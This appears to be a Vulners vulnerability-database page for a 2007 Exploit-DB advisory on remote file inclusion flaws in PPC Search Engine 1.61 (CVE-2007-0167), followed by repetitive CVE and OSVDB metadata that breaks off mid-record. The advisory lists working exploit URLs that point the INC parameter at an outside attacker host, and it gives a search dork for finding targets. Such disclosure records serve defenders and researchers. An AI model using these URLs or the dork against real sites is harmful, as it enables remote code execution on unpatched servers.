Search...

PPC Search Engine 1.61 INC Multiple Remote File Include Vulnerabilities

2007-01-09T00:00:00

ID EDB-ID:3104
Type exploitdb
Reporter IbnuSina
Modified 2007-01-09T00:00:00

Description

PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities. CVE-2007-0167. Webapps exploit for php platform

                                        
                                            ============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# script demo: http://www.hyper-scripts.com/demo/ppc/
# Risk          : very danger
# Thanks To  : all #hitamputih crew
# special To  : str0ke@milw0rm.com,akukasih,nyubi,irvian,BlueSpy
[[SQL]]]---------------------------------------------------------
on dir config
file config_admin.php
================
require($INC."functions/functions_admin.php");

// require($INC."functions/functions_payment.php");

require($INC."config/admin_pw.php");

require($INC."config/config_member.php");




file config_main.php

require($INC."config/site_url.php");

require($INC."config/mysql_config.php");

require($INC."functions/functions_main.php");

require($INC."functions/external_results.php");



file config_member.php
=================

require($INC."functions/functions_member.php");

require($INC."functions/functions_payment.php");




file mysql_config.php
===============
require($INC."functions/db_functions.php");

require($INC."config/db_info.php");

explot :
http://target.lu/path/config/config_admin.php?INC=http://injekan.lu?
http://target.lu/path/config/config_main.php?INC=http://injekan.lu?
http://target.lu/path/config/config_member.php?INC=http://injekan.lu?
http://target.lu/path/config/mysql_config.php?INC=http://injekan.lu?


on dir admini

file admin.php
===========

require($INC."config/config_main.php");

require($INC."config/config_admin.php");

require($INC."functions/functions_bu_and_reports.php");

require($INC."config/dbstructure.php");

file index.php
============
require("path.php");
require($INC."config/config_main.php");
require($INC."config/config_admin.php");

exploit :

http://target.lu/path/admini/admin.php?INC=http://injekan.lu?
http://target.lu/path/admini/index.php?INC=http://injekan.lu?

on dir paypalipn
file ipnprocess.php

require($INC."config/config_main.php");
require($INC."functions/functions_payment.php");

exploit :

http://target.lu/path/paypalipn/ipnprocess.php?INC=http://injekan.lu?

on dir members

require($INC."config/config_main.php");
require($INC."config/config_member.php");
require($INC."functions/functions_bu_and_reports.php");

exploit :

http://target.lu/path/members/index.php?INC=http://injekan.lu?
http://target.lu/path/members/registration.php?INC=http://injekan.lu?

on dir main
file index.php
require("path.php");
require($INC."config/config_main.php");
require($INC."config/config_main2.php");
require($INC."functions/functions_search.php");
mysql_connect ($DBHost, $DBLogin, $DBPassword);

file ppcbannerclick.php and ppcclick.php

require("path.php");
require($INC."config/config_main.php");

exploit :

http://target.lu/path/main/ppcbannerclick.php?INC=http://injekan.lu?
http://target.lu/path/main/ppcclick.php?INC=http://injekan.lu?

google dork : intitle:"ppc engine admin login form"
=======================================================

# milw0rm.com [2007-01-09]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3104", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PPC Search Engine 1.61 INC Multiple Remote File Include Vulnerabilities", "description": "PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities. CVE-2007-0167. Webapps exploit for php platform", "published": "2007-01-09T00:00:00", "modified": "2007-01-09T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://www.exploit-db.com/exploits/3104/", "reporter": "IbnuSina", "references": [], "cvelist": ["CVE-2007-0167"], "lastseen": "2016-01-31T17:45:04", "viewCount": 6, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-01-31T17:45:04", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0167"]}, {"type": "osvdb", "idList": ["OSVDB:33453", "OSVDB:33445", "OSVDB:33451", "OSVDB:33450", "OSVDB:33446", "OSVDB:33449", "OSVDB:33452", "OSVDB:33444", "OSVDB:33454", "OSVDB:33448"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7020"]}], "modified": "2016-01-31T17:45:04", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/3104/", "sourceData": "============================ HItamputih Crew ====================\n# hitamputih Advisory\n# Discovered By : IbnuSina\n#-----------------------------------------------------------\n# script demo: http://www.hyper-scripts.com/demo/ppc/\n# Risk : very danger\n# Thanks To : all #hitamputih crew\n# special To : str0ke@milw0rm.com,akukasih,nyubi,irvian,BlueSpy\n[[SQL]]]---------------------------------------------------------\non dir config\nfile config_admin.php\n================\nrequire($INC.\"functions/functions_admin.php\");\n\n// require($INC.\"functions/functions_payment.php\");\n\nrequire($INC.\"config/admin_pw.php\");\n\nrequire($INC.\"config/config_member.php\");\n\n\n\n\nfile config_main.php\n\nrequire($INC.\"config/site_url.php\");\n\nrequire($INC.\"config/mysql_config.php\");\n\nrequire($INC.\"functions/functions_main.php\");\n\nrequire($INC.\"functions/external_results.php\");\n\n\n\nfile config_member.php\n=================\n\nrequire($INC.\"functions/functions_member.php\");\n\nrequire($INC.\"functions/functions_payment.php\");\n\n\n\n\nfile mysql_config.php\n===============\nrequire($INC.\"functions/db_functions.php\");\n\nrequire($INC.\"config/db_info.php\");\n\nexplot :\nhttp://target.lu/path/config/config_admin.php?INC=http://injekan.lu?\nhttp://target.lu/path/config/config_main.php?INC=http://injekan.lu?\nhttp://target.lu/path/config/config_member.php?INC=http://injekan.lu?\nhttp://target.lu/path/config/mysql_config.php?INC=http://injekan.lu?\n\n\non dir admini\n\nfile admin.php\n===========\n\nrequire($INC.\"config/config_main.php\");\n\nrequire($INC.\"config/config_admin.php\");\n\nrequire($INC.\"functions/functions_bu_and_reports.php\");\n\nrequire($INC.\"config/dbstructure.php\");\n\nfile index.php\n============\nrequire(\"path.php\");\nrequire($INC.\"config/config_main.php\");\nrequire($INC.\"config/config_admin.php\");\n\nexploit :\n\nhttp://target.lu/path/admini/admin.php?INC=http://injekan.lu?\nhttp://target.lu/path/admini/index.php?INC=http://injekan.lu?\n\non dir paypalipn\nfile ipnprocess.php\n\nrequire($INC.\"config/config_main.php\");\nrequire($INC.\"functions/functions_payment.php\");\n\nexploit :\n\nhttp://target.lu/path/paypalipn/ipnprocess.php?INC=http://injekan.lu?\n\non dir members\n\nrequire($INC.\"config/config_main.php\");\nrequire($INC.\"config/config_member.php\");\nrequire($INC.\"functions/functions_bu_and_reports.php\");\n\nexploit :\n\nhttp://target.lu/path/members/index.php?INC=http://injekan.lu?\nhttp://target.lu/path/members/registration.php?INC=http://injekan.lu?\n\non dir main\nfile index.php\nrequire(\"path.php\");\nrequire($INC.\"config/config_main.php\");\nrequire($INC.\"config/config_main2.php\");\nrequire($INC.\"functions/functions_search.php\");\nmysql_connect ($DBHost, $DBLogin, $DBPassword);\n\nfile ppcbannerclick.php and ppcclick.php\n\nrequire(\"path.php\");\nrequire($INC.\"config/config_main.php\");\n\nexploit :\n\nhttp://target.lu/path/main/ppcbannerclick.php?INC=http://injekan.lu?\nhttp://target.lu/path/main/ppcclick.php?INC=http://injekan.lu?\n\ngoogle dork : intitle:\"ppc engine admin login form\"\n=======================================================\n\n# milw0rm.com [2007-01-09]\n", "osvdbidlist": ["33449", "33447", "33446", "33444", "33448", "33454", "33453", "33451", "33452", "33445", "33450"]}

{"cve": [{"lastseen": "2020-10-03T11:45:48", "description": "Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine), as distributed with other aliases, allow remote attackers to execute arbitrary PHP code via a URL in the INC parameter in (1) config_admin.php, (2) config_main.php, (3) config_member.php, and (4) mysql_config.php in config/; (5) admin.php and (6) index.php in admini/; (7) paypalipn/ipnprocess.php; (8) index.php and (9) registration.php in members/; and (10) ppcbannerclick.php and (11) ppcclick.php in main/.", "edition": 3, "cvss3": {}, "published": "2007-01-10T01:28:00", "title": "CVE-2007-0167", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0167"], "modified": "2018-10-16T16:31:00", "cpe": ["cpe:/a:ppc_search_engine:ppc_search_engine:1.61", "cpe:/a:wgs-ppc:wgs-ppc:*"], "id": "CVE-2007-0167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0167", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wgs-ppc:wgs-ppc:*:*:*:*:*:*:*:*", "cpe:2.3:a:ppc_search_engine:ppc_search_engine:1.61:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_main.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_main.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_main.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33445", "id": "OSVDB:33445", "title": "WGS-PPC (PPC Search Engine) config/config_main.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the paypalipn/ipnprocess.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the paypalipn/ipnprocess.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/paypalipn/ipnprocess.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33450", "id": "OSVDB:33450", "title": "WGS-PPC (PPC Search Engine) paypalipn/ipnprocess.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the members/registration.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the members/registration.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/members/registration.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33452", "id": "OSVDB:33452", "title": "WGS-PPC (PPC Search Engine) members/registration.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcbannerclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcbannerclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/main/ppcbannerclick.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33453", "id": "OSVDB:33453", "title": "WGS-PPC (PPC Search Engine) main/ppcbannerclick.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/main/ppcclick.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33454", "id": "OSVDB:33454", "title": "WGS-PPC (PPC Search Engine) main/ppcclick.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/mysql_config.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/mysql_config.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/mysql_config.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33447", "id": "OSVDB:33447", "title": "WGS-PPC (PPC Search Engine) config/mysql_config.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/index.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/index.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/admini/index.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33449", "id": "OSVDB:33449", "title": "WGS-PPC (PPC Search Engine) admini/index.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_admin.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33444", "id": "OSVDB:33444", "title": "WGS-PPC (PPC Search Engine) config/config_admin.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_member.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_member.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_member.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: 